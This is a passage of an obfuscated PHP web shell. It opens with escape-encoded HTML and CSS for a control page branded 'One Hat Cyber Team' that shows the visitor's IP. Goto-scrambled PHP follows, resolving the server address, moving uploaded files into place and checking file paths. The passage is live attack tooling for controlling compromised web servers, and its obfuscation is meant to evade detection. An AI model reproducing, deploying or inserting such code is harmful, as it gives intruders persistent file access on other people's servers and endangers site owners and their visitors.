63\157\155\x65\x2e\x6d\151\x6e\56\143\163\x73\x22\x3e\15\12\x20\x20\40\x20\74\154\151\156\x6b\40\162\145\x6c\75\x22\151\x63\157\x6e\42\x20\150\x72\145\146\x3d\42\x2f\x2f\x69\56\x69\x6d\x67\165\x72\x2e\143\157\x6d\x2f\x72\162\x6f\x54\120\x42\113\56\152\x70\145\147\42\76\xd\xa\x20\40\x20\40\74\x73\x74\x79\154\x65\x20\x74\x79\160\x65\x3d\42\164\x65\170\x74\57\x63\163\163\x22\76\xd\xa\100\151\155\x70\x6f\162\x74\x20\x75\x72\x6c\x28\47\150\x74\164\160\x73\x3a\x2f\57\x66\x6f\x6e\x74\x73\56\x67\x6f\x6f\147\x6c\145\141\160\151\163\56\143\x6f\155\x2f\x63\x73\x73\62\x3f\146\141\x6d\151\x6c\171\x3d\101\155\x61\x72\x61\x6e\x74\x68\72\x69\164\x61\x6c\54\x77\147\x68\x74\x40\x30\54\x34\60\x30\73\x30\54\67\x30\60\x3b\x31\x2c\x34\60\60\73\61\54\x37\60\x30\46\x64\x69\x73\160\x6c\x61\171\75\x73\167\141\160\47\x29\x3b\15\xa\142\157\x64\x79\x20\x7b\xd\12\40\40\x20\x20\143\x6f\x6c\x6f\162\72\x20\x62\x6c\x61\x63\x6b\73\xd\xa\40\40\40\x20\x66\157\156\x74\x2d\x73\x69\172\x65\72\40\60\x70\170\x3b\15\12\x20\x20\x20\x20\x66\x6f\156\x74\55\x66\x61\x6d\x69\154\171\x3a\40\47\101\x6d\x61\x72\x61\156\x74\x68\47\73\15\xa\40\40\40\x20\x77\x69\x64\x74\150\72\40\71\x39\x25\x3b\xd\xa\40\40\40\x20\x70\141\144\x64\x69\x6e\147\x3a\40\x30\160\170\x3b\xd\12\40\40\x20\40\155\x61\162\x67\151\x6e\x2d\162\151\147\150\164\72\x20\x61\x75\164\157\73\xd\12\40\40\40\x20\x6d\x61\162\x67\x69\x6e\55\x6c\x65\146\164\x3a\40\141\165\x74\157\x3b\15\12\40\40\40\40\155\x61\x72\147\151\156\x2d\x74\157\x70\x3a\40\x37\x70\x78\x3b\xd\12\40\40\x20\x20\155\141\162\147\151\x6e\55\x62\x6f\x74\x74\157\155\72\40\67\160\x78\73\15\12\40\40\x20\40\142\x61\143\x6b\147\x72\157\x75\x6e\x64\x2d\x63\157\x6c\x6f\162\72\x20\x62\154\141\143\153\x21\x69\155\x70\157\x72\x74\141\x6e\x74\x3b\xd\xa\x7d\xd\12\xd\12\56\x62\147\x2d\x64\x61\x72\x6b\40\173\15\xa\x20\x20\x20\40\142\x61\x63\x6b\147\162\157\165\156\144\x2d\143\157\154\157\162\x3a\x20\142\x6c\141\143\x6b\41\151\155\x70\157\x72\x74\141\156\164\73\15\12\175\15\xa\15\12\56\142\157\162\144\145\x72\40\173\15\xa\40\x20\x20\40\142\157\170\x2d\163\150\x61\144\157\167\x3a\x20\x30\x70\x78\x20\60\x70\x78\40\x31\x30\x70\x78\40\x23\x30\60\142\146\146\x66\x3b\xd\12\40\40\x20\40\x62\x6f\162\x64\145\x72\x3a\40\62\160\x78\x20\163\x6f\154\151\x64\x20\43\60\60\x62\x66\146\146\41\x69\x6d\160\157\162\164\141\156\164\73\xd\xa\40\x20\40\40\142\157\162\144\145\x72\x2d\x72\141\144\151\x75\x73\x3a\x20\x35\160\x78\73\xd\12\40\x20\x20\x20\142\141\143\153\x67\162\x6f\x75\156\x64\x3a\40\164\x72\x61\x6e\163\160\141\162\145\x6e\x74\73\xd\12\x7d\xd\12\15\12\56\142\157\162\144\145\x72\x3a\x68\x6f\x76\145\x72\x20\x7b\15\12\40\40\40\40\x62\157\170\x2d\163\x68\141\x64\157\167\x3a\40\x30\160\x78\40\x30\160\x78\40\x31\60\160\170\40\x23\x30\60\x62\146\x66\x66\x3b\xd\12\40\40\40\x20\142\x6f\x72\x64\x65\x72\x3a\x20\62\x70\170\40\x73\157\x6c\x69\x64\x20\43\60\60\x62\x66\146\x66\x21\x69\x6d\160\157\162\164\141\156\x74\x3b\15\12\x7d\15\xa\xd\12\x2e\164\141\142\x6c\145\40\164\x64\x20\x7b\xd\12\40\40\40\x20\x70\141\x64\x64\151\156\x67\72\40\x30\56\x31\162\145\x6d\x3b\xd\xa\40\40\x20\x20\142\157\x78\55\x73\150\141\144\157\x77\x3a\40\151\156\163\145\164\40\60\x70\170\x20\60\160\170\x20\60\x70\x78\40\61\160\170\40\x23\60\x30\x62\146\146\146\73\xd\12\x20\40\40\x20\142\x6f\x72\144\145\x72\x2d\162\x61\144\151\165\163\x3a\40\62\160\170\x3b\15\xa\x7d\15\xa\xd\12\56\x74\x61\142\x6c\x65\x20\164\x68\145\x61\x64\40\x74\150\x20\173\15\xa\x20\40\x20\x20\146\x6f\x6e\164\55\146\x61\x6d\151\x6c\171\72\40\47\x41\x6d\x61\162\x61\156\164\x68\47\x2c\x20\x63\x75\x72\163\151\x76\145\73\xd\12\40\40\x20\40\x62\157\x78\x2d\x73\150\x61\144\157\167\x3a\40\151\x6e\x73\145\164\40\x30\x70\170\x20\x30\x70\170\40\60\160\170\40\61\56\x35\160\x78\x20\x23\x30\60\x62\146\x66\x66\73\15\xa\40\x20\40\40\143\157\154\x6f\x72\72\x20\43\60\60\x62\x66\x66\146\73\xd\xa\x20\x20\x20\40\x70\141\x64\x64\x69\x6e\x67\72\x20\x30\x2e\62\65\x72\x65\155\73\15\12\x20\x20\x20\40\142\x6f\x72\144\x65\162\x2d\162\x61\x64\x69\165\163\x3a\x20\x35\x70\x78\x3b\15\xa\x20\x20\x20\40\x62\x61\x63\x6b\x67\162\x6f\165\x6e\144\x3a\x20\x6c\151\x6e\145\x61\x72\55\x67\162\141\144\151\x65\x6e\x74\x28\x74\157\x20\142\157\x74\164\157\x6d\54\40\x62\x6c\141\143\x6b\54\x20\x23\x33\146\63\146\x33\146\70\x30\51\x3b\15\12\x7d\xd\12\xd\xa\x2e\x74\141\x62\x6c\x65\55\150\157\166\x65\x72\x20\164\x62\157\x64\171\x20\x74\162\72\x68\x6f\x76\145\x72\x20\164\144\x20\173\xd\xa\40\x20\x20\x20\142\141\143\153\147\x72\x6f\x75\156\144\x3a\40\43\x33\x66\63\x66\x33\146\70\60\73\15\xa\x20\40\x20\x20\142\x6f\x78\x2d\x73\x68\x61\x64\157\x77\x3a\x20\151\x6e\x73\x65\x74\x20\60\x70\170\40\x30\160\x78\40\60\x70\170\40\x31\x70\170\40\43\x30\x30\x62\x66\x66\146\x3b\15\12\40\x20\x20\40\142\157\162\144\145\162\55\x72\141\144\x69\165\163\x3a\x20\62\x70\x78\73\xd\12\x7d\15\12\xd\12\x2e\x74\x61\142\154\x65\55\150\x6f\166\x65\x72\x20\164\x62\157\x64\x79\40\x74\x72\x3a\x68\157\166\x65\162\x20\164\x64\76\x2a\40\x7b\15\xa\175\xd\12\15\12\x2e\x74\x61\x62\x6c\145\x3e\x74\x62\157\x64\x79\x3e\164\162\x3e\52\40\173\15\xa\40\40\x20\40\x63\157\x6c\x6f\162\72\x23\x66\x66\x66\x3b\15\xa\x20\x20\x20\40\166\145\162\164\x69\x63\141\x6c\55\141\x6c\x69\147\x6e\72\x6d\x69\144\x64\x6c\145\73\15\xa\175\xd\xa\15\xa\x2e\x66\x6f\x72\155\55\143\157\156\164\162\157\154\40\x7b\15\xa\40\x20\x20\40\x62\141\143\x6b\147\x72\157\165\x6e\x64\x3a\x30\40\60\x21\x69\155\x70\157\x72\164\141\156\164\x3b\15\12\40\40\40\x20\143\157\154\x6f\x72\72\x23\146\146\146\41\x69\155\x70\x6f\162\164\x61\x6e\x74\x3b\15\12\40\40\x20\x20\x62\157\162\x64\x65\162\x2d\x72\x61\144\x69\x75\x73\72\60\73\15\12\x7d\xd\12\xd\12\56\x66\x6f\x72\155\x2d\143\x6f\x6e\x74\162\x6f\154\x3a\x3a\160\154\x61\x63\145\x68\157\x6c\x64\145\162\x20\173\15\xa\40\40\40\40\x63\157\x6c\x6f\x72\x3a\43\x66\146\146\73\15\xa\40\x20\40\x20\157\x70\141\143\x69\x74\171\72\x31\73\15\12\175\xd\12\15\xa\56\146\157\162\155\x2d\x67\x72\x6f\x75\x70\x20\173\15\xa\x20\40\x20\40\x6d\141\162\147\151\x6e\x2d\164\157\x70\x3a\40\56\63\x72\x65\x6d\x3b\xd\12\x20\40\40\40\155\141\x72\147\x69\156\x2d\142\x6f\164\164\x6f\x6d\x3a\x20\x2e\63\x72\x65\x6d\73\15\xa\x7d\15\xa\xd\xa\x6c\151\x20\173\xd\xa\40\40\x20\40\146\x6f\156\x74\x2d\x73\x69\172\145\x3a\x6c\x61\x72\147\x65\41\151\x6d\x70\157\162\x74\x61\156\164\73\15\xa\40\x20\40\40\143\157\154\x6f\162\72\x20\x23\60\60\142\x66\146\146\41\151\x6d\x70\157\x72\164\141\156\164\73\xd\xa\x20\x20\x20\x20\154\x69\x73\164\x2d\163\164\x79\x6c\145\x3a\40\151\156\x68\145\162\151\x74\x21\151\x6d\160\157\x72\164\x61\x6e\164\x3b\15\xa\x7d\xd\xa\xd\12\141\40\173\xd\12\40\40\40\40\143\x6f\154\x6f\162\x3a\40\x23\x66\x66\x66\x66\146\x66\73\15\xa\x20\x20\x20\40\164\145\x78\164\55\x64\145\x63\x6f\162\141\164\151\x6f\156\72\x20\156\157\156\145\x21\151\x6d\160\x6f\x72\164\x61\x6e\x74\73\xd\xa\175\15\12\15\12\141\x3a\x68\157\166\145\x72\x20\x7b\15\12\40\x20\x20\x20\164\145\170\164\55\x64\x65\x63\157\162\141\x74\151\x6f\x6e\x3a\x20\156\157\x6e\145\x21\151\x6d\x70\x6f\162\x74\141\156\164\x3b\15\xa\x20\40\40\40\143\x6f\154\x6f\162\x3a\40\43\x30\x30\142\x66\146\x66\x3b\15\xa\40\40\40\x20\x61\156\x69\155\x61\x74\151\157\x6e\72\x20\153\145\144\151\x70\x20\61\163\x20\154\151\x6e\145\x61\x72\x20\151\156\146\x69\156\151\x74\145\73\xd\12\x7d\xd\xa\xd\12\150\65\40\173\xd\xa\x20\x20\40\x20\155\x61\x72\147\151\x6e\x2d\164\x6f\160\x3a\40\61\x2e\65\160\170\73\15\12\40\x20\x20\40\155\x61\162\147\151\x6e\55\x62\157\x74\164\x6f\155\x3a\40\x31\56\x35\x70\x78\73\15\12\x20\x20\x20\40\143\157\x6c\157\162\72\x20\x23\60\x30\142\x66\x66\146\x21\151\155\160\x6f\162\164\x61\x6e\164\x3b\15\xa\x20\40\40\40\160\x61\x64\x64\x69\156\x67\x3a\40\62\160\x78\x3b\xd\xa\175\15\xa\xd\xa\164\x65\170\x74\x61\x72\145\141\x20\x7b\15\xa\40\40\x20\40\167\x69\x64\164\150\72\x20\x39\x37\45\73\xd\xa\40\x20\x20\40\x66\x6f\x6e\x74\x2d\x73\x69\172\x65\x3a\40\155\145\144\x69\165\155\x21\x69\x6d\160\x6f\162\x74\x61\x6e\x74\x3b\15\xa\40\40\40\x20\x66\x6f\x6e\164\55\146\x61\x6d\151\154\x79\72\x20\151\156\x68\x65\162\151\164\x3b\xd\12\x20\40\x20\40\x68\145\151\147\x68\164\x3a\x20\x34\x34\x76\150\x3b\15\xa\x20\40\40\x20\160\141\x64\144\151\156\x67\55\x6c\x65\x66\x74\72\40\65\160\x78\x3b\15\12\175\xd\12\15\xa\142\x75\164\x74\157\x6e\54\40\x69\156\x70\165\x74\x20\x7b\15\xa\x20\40\40\40\x62\157\x72\x64\145\162\x3a\x20\x32\x70\170\40\163\x6f\154\x69\144\x20\43\60\60\x62\146\146\146\x3b\xd\12\40\40\40\40\142\x6f\162\x64\145\162\55\x72\141\144\151\x75\163\x3a\40\x35\x70\170\x3b\15\xa\x20\x20\x20\40\146\157\x6e\x74\x2d\x73\151\172\145\x3a\x20\61\x35\160\170\73\15\xa\40\40\40\40\x63\157\x6c\157\x72\x3a\167\150\x69\164\145\x3b\15\xa\x20\x20\x20\x20\154\151\x6e\145\x2d\x68\145\151\147\150\x74\x3a\40\156\157\162\x6d\x61\x6c\x3b\15\12\x20\40\40\x20\x66\x6f\156\164\55\146\141\155\x69\154\x79\72\x20\151\x6e\150\145\162\x69\x74\x3b\xd\12\175\xd\12\xd\xa\x62\x75\x74\164\x6f\x6e\54\x20\151\156\160\x75\x74\72\150\157\x76\x65\x72\x20\173\xd\12\x20\40\x20\x20\x62\x6f\162\x64\x65\162\72\40\62\160\170\x20\x73\x6f\x6c\x69\x64\40\43\x30\x30\x62\146\x66\x66\73\15\xa\40\40\x20\x20\143\165\162\163\x6f\162\72\x20\x70\x6f\x69\156\x74\x65\162\73\xd\12\x7d\15\xa\15\xa\x2e\157\150\x63\164\40\x7b\xd\12\x20\40\40\x20\x70\141\x64\x64\151\156\x67\x2d\154\145\146\x74\72\40\61\162\145\x6d\73\xd\12\40\40\40\x20\160\141\144\144\151\156\147\x2d\162\x69\x67\150\164\x3a\40\x31\162\145\x6d\73\15\12\x20\x20\x20\x20\x63\x6f\154\157\x72\72\40\x77\x68\x69\x74\x65\x3b\xd\xa\x20\40\x20\40\x62\x6f\162\x64\x65\x72\x3a\x20\62\x70\170\40\163\x6f\154\151\144\x20\x23\x30\x30\142\146\146\146\x3b\15\12\x20\40\40\x20\x62\x6f\162\x64\x65\162\55\162\141\x64\151\x75\x73\x3a\40\65\160\x78\x3b\xd\12\40\40\x20\40\142\141\143\153\147\x72\x6f\x75\156\144\55\x63\157\154\157\x72\x3a\40\164\x72\x61\156\x73\x70\x61\x72\x65\x6e\164\73\xd\xa\x20\40\40\x20\146\157\156\x74\x2d\146\x61\x6d\x69\x6c\x79\x3a\x20\151\156\150\x65\162\151\164\x3b\15\xa\40\x20\40\x20\x66\x6f\156\x74\55\x73\x69\172\145\72\x20\61\x36\160\170\73\xd\12\x7d\15\xa\xd\12\56\157\x68\x63\164\72\150\157\x76\145\162\40\173\xd\12\40\x20\40\x20\142\157\162\x64\x65\x72\72\x20\62\160\170\40\x73\157\x6c\x69\144\x20\43\60\60\x62\146\x66\x66\73\15\xa\40\40\x20\x20\x63\157\x6c\x6f\x72\72\40\x23\60\60\142\x66\x66\146\x21\x69\x6d\160\x6f\x72\164\x61\156\x74\x3b\15\xa\175\15\12\15\12\56\143\157\x6d\x62\145\x74\x20\173\15\12\40\40\40\40\143\x6f\x6c\x6f\162\x3a\40\167\x68\151\164\145\x3b\xd\12\x7d\xd\xa\15\xa\x2e\143\157\155\x62\145\164\x3a\x68\x6f\x76\145\162\x20\x7b\xd\xa\x20\40\x20\x20\x63\157\154\157\162\72\40\x23\x30\x30\x62\x66\x66\146\x3b\15\xa\175\xd\12\xd\xa\x2e\160\55\61\40\x7b\15\12\40\x20\40\x20\160\141\144\x64\151\156\147\72\x20\64\160\x78\73\15\xa\x7d\15\xa\15\xa\72\x3a\x73\145\x6c\x65\x63\x74\x69\x6f\156\40\173\xd\xa\x20\x20\40\40\143\x6f\x6c\157\x72\72\40\x62\x6c\x61\143\153\x3b\15\xa\x20\40\40\x20\142\x61\x63\x6b\147\162\157\165\x6e\x64\x3a\x20\163\151\x6c\166\145\x72\x3b\xd\xa\175\xd\12\xd\12\56\x66\x61\40\173\15\12\40\x20\x20\x20\160\x61\x64\x64\x69\156\x67\72\40\61\x30\160\170\73\15\12\x20\40\40\40\x66\157\156\164\55\163\151\x7a\x65\x3a\x20\62\60\x70\170\x3b\xd\xa\40\40\x20\x20\167\151\144\164\150\x3a\x20\x35\60\160\170\73\xd\12\x20\x20\40\x20\x74\145\170\x74\55\141\154\x69\147\x6e\72\x20\x63\x65\x6e\164\x65\162\73\15\xa\x20\40\40\x20\x74\x65\170\x74\55\144\145\143\157\x72\141\164\151\x6f\156\72\40\x6e\157\x6e\145\x3b\15\12\x20\40\x20\40\x6d\141\162\x67\x69\156\72\40\x35\160\x78\73\xd\xa\40\x20\x20\40\143\x6f\x6c\x6f\x72\x3a\x20\43\60\60\x62\x66\146\146\73\xd\12\x7d\15\xa\15\12\56\146\141\x3a\150\157\166\x65\162\40\173\xd\xa\x20\x20\40\x20\x62\x6f\x72\144\145\162\x3a\40\x32\160\x78\x20\163\157\x6c\x69\144\x20\x23\x30\x30\x62\146\146\x66\73\xd\xa\175\xd\xa\xd\xa\56\x74\x65\170\x74\x2d\x6c\x69\x67\x68\x74\40\173\xd\xa\x20\40\40\40\x63\x6f\x6c\157\162\x3a\x20\x23\x66\x38\x66\x39\x66\141\x21\x69\x6d\160\x6f\x72\x74\141\156\x74\73\15\xa\x20\x20\x20\40\146\x6f\156\x74\55\x73\x69\172\x65\x3a\40\154\141\162\x67\145\41\x69\x6d\x70\157\162\164\141\156\164\x3b\xd\12\x7d\15\xa\xd\xa\x2e\153\x65\x64\x69\160\x20\173\xd\12\40\x20\40\x20\x61\156\x69\155\141\164\151\x6f\156\72\x20\153\145\x64\x69\160\40\61\163\40\154\x69\x6e\x65\141\162\x20\x69\156\146\x69\x6e\x69\x74\145\x3b\15\12\x7d\15\xa\15\12\100\153\145\171\x66\162\x61\155\x65\163\40\153\x65\x64\151\160\x20\173\xd\xa\40\40\40\x20\x30\x25\x20\x7b\15\12\x20\x20\x20\x20\x20\40\40\40\143\x6f\154\157\162\72\x20\43\60\x30\x62\146\x66\x66\73\xd\xa\40\x20\40\x20\x7d\15\12\x20\40\40\40\65\60\x25\40\x7b\xd\xa\x20\x20\x20\40\40\x20\x20\40\143\157\x6c\157\162\72\40\167\150\151\164\145\73\15\xa\x20\x20\x20\40\x7d\15\xa\x20\x20\40\x20\61\60\x30\x25\40\x7b\xd\12\x20\40\40\x20\x20\x20\40\x20\143\157\154\x6f\x72\x3a\40\43\x30\x30\142\146\x66\x66\73\xd\xa\40\40\x20\40\x7d\xd\xa\175\15\12\15\12\x40\x6b\x65\x79\146\x72\x61\x6d\145\x73\x20\x72\141\151\x6e\142\x6f\x77\102\x6f\162\144\x65\x72\x20\173\15\xa\40\40\40\x20\x20\x20\x20\40\x20\40\x20\40\x30\45\40\173\15\xa\40\40\40\40\40\x20\40\40\x20\x20\x20\40\40\x20\x20\40\x62\157\162\144\x65\x72\x2d\151\x6d\x61\x67\x65\x3a\40\154\151\156\145\x61\162\55\147\162\141\144\151\145\156\164\50\x74\x6f\x20\x72\x69\147\150\164\x2c\x20\x23\x30\x30\x62\x66\146\146\x2c\40\155\141\147\x65\x6e\x74\141\51\40\61\x3b\15\12\40\40\x20\40\x20\x20\x20\40\x20\x20\40\x20\175\15\12\x20\x20\40\x20\40\40\40\x20\x20\x20\x20\x20\61\x34\x25\x20\173\15\xa\x20\40\40\x20\x20\x20\40\40\40\x20\40\40\x20\40\40\x20\142\157\162\144\x65\x72\x2d\x69\x6d\141\x67\x65\x3a\40\x6c\151\156\x65\141\x72\55\x67\x72\141\x64\151\x65\156\x74\50\164\157\x20\x72\151\x67\150\164\x2c\40\x6d\141\147\145\x6e\x74\141\x2c\40\x6c\x69\155\145\x29\40\x31\73\xd\xa\x20\x20\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x7d\xd\12\40\40\x20\x20\x20\40\x20\40\40\40\40\40\x32\x38\x25\x20\x7b\15\12\40\40\x20\x20\40\40\x20\40\x20\x20\x20\40\40\40\40\x20\x62\x6f\x72\144\x65\162\55\151\155\x61\x67\x65\72\x20\154\151\x6e\145\x61\x72\x2d\147\x72\x61\x64\x69\x65\156\x74\x28\164\157\40\162\x69\x67\x68\x74\x2c\x20\x6c\x69\x6d\145\x2c\40\x79\145\154\x6c\x6f\167\x29\40\x31\x3b\xd\xa\40\x20\40\40\x20\40\40\40\x20\x20\x20\x20\175\xd\12\x20\x20\40\x20\x20\x20\x20\x20\40\40\x20\40\64\62\45\x20\173\15\xa\40\40\40\x20\x20\x20\x20\40\40\40\x20\x20\40\x20\x20\x20\142\157\162\144\x65\162\55\151\155\141\147\x65\72\x20\154\x69\156\145\x61\x72\x2d\147\162\x61\144\x69\x65\x6e\164\x28\x74\157\x20\162\151\147\x68\164\54\40\171\x65\154\x6c\x6f\x77\x2c\x20\x6f\x72\x61\x6e\147\x65\x29\x20\x31\x3b\xd\12\x20\x20\40\x20\x20\x20\x20\40\40\40\40\40\x7d\xd\12\40\40\40\x20\x20\40\x20\x20\40\x20\x20\x20\65\x37\45\x20\173\xd\xa\40\40\40\40\x20\x20\x20\x20\40\40\40\40\40\x20\x20\x20\142\x6f\x72\144\x65\x72\x2d\x69\155\x61\147\145\72\x20\x6c\151\156\x65\x61\x72\55\147\x72\x61\144\151\145\x6e\x74\50\x74\x6f\40\162\151\x67\150\164\x2c\x20\157\x72\141\x6e\147\145\x2c\x20\162\145\x64\51\40\x31\x3b\15\12\40\x20\40\x20\x20\x20\x20\40\40\40\40\40\x7d\xd\xa\x20\x20\40\x20\40\x20\40\40\40\x20\40\40\x37\x31\45\x20\x7b\xd\12\40\x20\x20\40\40\x20\x20\40\40\40\x20\40\x20\x20\x20\x20\142\x6f\162\x64\x65\162\x2d\151\155\x61\x67\x65\72\40\x6c\x69\156\145\141\x72\x2d\147\162\141\144\151\x65\156\164\50\x74\x6f\40\x72\151\x67\150\164\x2c\40\x72\x65\144\x2c\40\x70\x69\156\x6b\x29\x20\61\x3b\15\12\x20\x20\x20\40\x20\40\x20\x20\40\x20\40\40\x7d\15\xa\x20\40\x20\40\40\40\40\x20\40\40\x20\x20\x38\x35\45\40\173\15\12\40\x20\40\40\x20\x20\40\x20\40\x20\40\40\40\40\x20\x20\x62\x6f\x72\x64\145\x72\x2d\151\x6d\141\x67\x65\x3a\40\x6c\151\x6e\145\x61\162\x2d\147\162\x61\144\x69\145\156\164\50\164\157\40\x72\151\147\150\164\54\x20\x70\151\x6e\153\54\x20\43\x30\60\142\146\x66\146\51\x20\x31\73\15\12\x20\40\x20\40\x20\40\40\x20\40\x20\x20\40\175\xd\xa\x20\x20\x20\40\x20\40\x20\x20\40\x20\40\x20\x31\x30\60\x25\x20\173\15\xa\40\40\x20\x20\x20\40\40\x20\40\x20\40\40\40\40\40\40\142\157\162\x64\145\162\x2d\151\x6d\141\x67\x65\x3a\x20\x6c\151\x6e\x65\141\162\x2d\x67\162\x61\x64\151\145\x6e\x74\x28\x74\x6f\40\162\x69\147\150\164\54\40\43\x30\60\x62\x66\146\x66\54\40\155\141\147\x65\x6e\164\141\x29\40\x31\73\xd\xa\x20\40\x20\40\40\x20\x20\x20\40\40\x20\x20\175\15\12\40\x20\40\x20\x20\x20\x20\x20\x7d\15\12\xd\xa\x2e\x72\141\x69\156\142\x6f\167\x2d\142\x6f\x72\144\x65\x72\40\173\15\xa\40\40\40\x20\142\157\x72\x64\x65\x72\x3a\40\x32\160\x78\40\163\157\x6c\151\x64\x20\162\x65\144\73\15\xa\40\40\40\x20\x62\157\162\x64\145\162\55\162\141\x64\151\x75\x73\72\40\x35\160\x78\41\x69\x6d\160\157\x72\164\141\156\x74\73\xd\xa\x20\x20\x20\x20\141\156\151\x6d\x61\x74\151\157\156\x3a\40\162\141\x69\x6e\x62\157\167\102\157\x72\x64\145\162\x20\62\x73\x20\x6c\151\x6e\x65\141\162\40\x69\156\146\151\x6e\151\x74\145\73\15\xa\175\xd\xa\x20\40\x20\x20\x20\40\x20\x20\100\x6b\145\171\x66\x72\x61\x6d\x65\x73\x20\162\x61\x69\156\x62\157\x77\124\145\170\164\x20\173\xd\12\x20\40\x20\x20\40\40\x20\40\x20\40\x20\x20\60\45\x20\173\15\xa\x20\40\40\40\40\40\40\40\x20\40\40\40\40\40\x20\x20\143\x6f\x6c\x6f\162\x3a\x20\x23\60\60\142\146\146\146\x3b\15\xa\x20\x20\40\x20\x20\40\40\40\x20\40\x20\40\x7d\xd\xa\x20\40\40\x20\x20\40\40\40\40\x20\40\40\x31\x34\x25\x20\173\xd\xa\x20\x20\x20\x20\40\40\40\40\40\x20\x20\x20\x20\40\40\x20\143\157\x6c\157\x72\x3a\40\155\x61\147\x65\x6e\x74\141\73\15\12\40\40\x20\x20\40\x20\40\40\x20\x20\x20\x20\175\xd\12\40\x20\x20\x20\40\x20\40\x20\x20\x20\40\x20\62\70\x25\x20\x7b\15\xa\x20\x20\x20\x20\x20\40\x20\40\40\x20\x20\40\x20\40\x20\40\143\157\x6c\x6f\162\x3a\x20\154\x69\x6d\x65\x3b\15\xa\40\x20\40\40\40\x20\40\x20\40\40\x20\x20\175\xd\xa\40\40\40\x20\x20\40\40\x20\x20\x20\x20\x20\64\62\45\x20\x7b\xd\xa\40\x20\x20\x20\40\40\40\40\x20\40\40\40\x20\x20\40\x20\x63\x6f\x6c\157\162\x3a\x20\171\x65\154\x6c\157\x77\x3b\xd\12\x20\x20\40\x20\x20\x20\x20\40\40\40\x20\x20\x7d\xd\xa\x20\40\x20\40\40\40\40\x20\40\40\40\40\65\x37\x25\40\173\xd\12\x20\x20\x20\40\40\x20\40\x20\x20\40\x20\x20\40\40\40\x20\x63\157\154\157\x72\72\40\x6f\x72\x61\156\147\x65\73\15\xa\x20\40\40\40\x20\40\40\40\40\x20\x20\40\175\15\xa\40\x20\40\40\x20\x20\40\x20\x20\x20\40\x20\67\x31\x25\x20\173\xd\xa\40\40\x20\40\x20\x20\40\40\x20\40\40\40\x20\x20\x20\x20\143\x6f\154\x6f\162\72\x20\162\145\144\x3b\15\12\x20\x20\40\x20\40\x20\40\40\x20\x20\x20\x20\175\15\xa\40\40\x20\40\40\x20\40\40\40\40\x20\x20\70\65\45\x20\173\xd\xa\40\40\x20\40\40\x20\40\x20\40\40\40\x20\x20\40\40\40\143\x6f\x6c\x6f\x72\72\40\x70\151\x6e\153\x3b\xd\xa\40\x20\x20\x20\40\40\x20\40\x20\40\x20\40\175\15\12\x20\x20\x20\x20\x20\40\40\x20\40\x20\x20\40\x31\x30\x30\45\x20\x7b\15\12\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\x20\x20\40\40\x20\143\157\x6c\x6f\x72\72\40\43\x30\x30\x62\x66\146\x66\73\xd\12\x20\40\40\x20\40\40\x20\40\40\x20\x20\40\175\xd\xa\x20\x20\40\40\40\40\40\x20\175\xd\xa\56\x72\141\x69\156\x62\157\x77\55\x74\145\x78\x74\x20\x7b\xd\12\40\40\x20\x20\x20\40\x20\x20\x20\40\40\x20\141\x6e\151\x6d\x61\x74\151\157\x6e\72\40\x72\x61\151\x6e\x62\157\x77\x54\x65\170\164\x20\x32\163\40\x69\x6e\146\151\x6e\x69\x74\x65\73\15\xa\x20\40\x20\40\40\40\40\40\40\x20\x20\x20\146\x6f\156\x74\x2d\x77\145\151\147\150\x74\72\40\x62\x6f\154\x64\73\15\xa\40\x20\40\x20\x20\40\x20\40\175\15\xa\x3c\x2f\x73\164\x79\x6c\x65\76\xd\12\40\x20\40\x20\74\x73\143\162\x69\x70\x74\x20\x73\x72\143\75\x22\x2f\x2f\x75\x6e\x70\x6b\147\x2e\x63\157\x6d\57\163\x77\145\x65\164\x61\154\x65\x72\x74\57\144\151\163\x74\x2f\x73\167\x65\x65\x74\x61\154\x65\162\x74\x2e\x6d\x69\156\56\x6a\163\42\76\x3c\57\163\x63\x72\151\x70\x74\76\xd\12\x3c\x2f\150\145\141\144\76\xd\12\74\x62\157\x64\171\x3e\15\12\x3c\x64\x69\166\40\143\154\x61\163\x73\75\x22\164\x61\142\154\145\55\162\145\163\x70\157\156\x73\x69\166\x65\40\164\145\170\164\x2d\154\151\147\150\164\40\162\x61\x69\x6e\142\157\x77\55\142\x6f\x72\x64\145\162\42\40\163\164\171\x6c\145\75\42\164\x65\170\164\55\x61\x6c\x69\x67\156\x3a\40\x6c\145\x66\164\73\x70\x61\144\x64\x69\156\x67\x3a\40\64\160\x78\x3b\42\x3e\xd\xa\74\x64\151\166\40\163\x74\171\154\145\75\42\x74\x65\x78\164\55\141\154\151\147\156\72\40\143\x65\156\164\x65\x72\x3b\144\151\x73\x70\x6c\x61\x79\x3a\x20\146\x6c\145\x78\73\141\x6c\x69\147\x6e\x2d\151\164\x65\155\163\72\40\x63\145\x6e\x74\x65\162\x3b\152\x75\x73\x74\151\x66\x79\55\x63\x6f\156\x74\145\156\164\72\x20\143\145\156\x74\145\162\x3b\141\154\151\x67\x6e\55\x63\157\x6e\x74\x65\x6e\164\72\x20\x63\x65\156\164\145\162\73\42\76\15\xa\x3c\x61\x20\x68\x72\x65\x66\x3d\42\77\x22\x20\x73\164\171\154\x65\x3d\42\146\x6f\x6e\164\x2d\x73\x69\x7a\145\72\40\x32\x72\145\155\73\160\141\x64\144\x69\156\147\x2d\154\x65\x66\164\x3a\40\x30\56\63\162\145\155\73\160\141\x64\144\151\x6e\147\55\x72\x69\147\x68\164\72\40\60\56\x33\x72\145\x6d\x3b\42\76\x3c\x73\x70\x61\156\40\x63\154\x61\163\x73\75\42\x72\141\151\156\x62\x6f\x77\55\x74\145\170\x74\42\x3e\x4f\156\145\x20\110\x61\x74\40\x43\x79\x62\x65\x72\x20\x54\145\141\155\74\57\163\160\141\x6e\x3e\74\x2f\x61\76\x20\15\12\x3c\57\x64\x69\166\76\xd\12\x3c\x6c\151\76\x59\157\165\162\x20\111\120\x20\72\x20\74\163\160\141\156\40\x73\164\171\154\x65\75\x22\x63\157\154\157\x72\x3a\x20\x77\x68\x69\x74\145\x3b\x22\x3e"; goto qv6Am; Y7Z0b: sEy8B: goto LExXx; P3c4U: echo "\x3c\57\144\151\x76\x3e\xd\12"; goto IXUL0; i6dER: echo gethostbyname($_SERVER["\123\105\122\126\105\122\137\x4e\101\115\x45"]); goto pUQui; ouN_B: sVyvh: goto FfdSI; Z3Rwf: $c8[$lE] = JD($c8[$lE]); goto n21be; as55f: if (move_uploaded_file($fileTmpName, $targetFilePath)) { goto uEny2; } goto SSOY8; V32i4: GqE6o: goto z00aG; tCv0u: if (file_exists($filePath)) { goto IfSJ9; 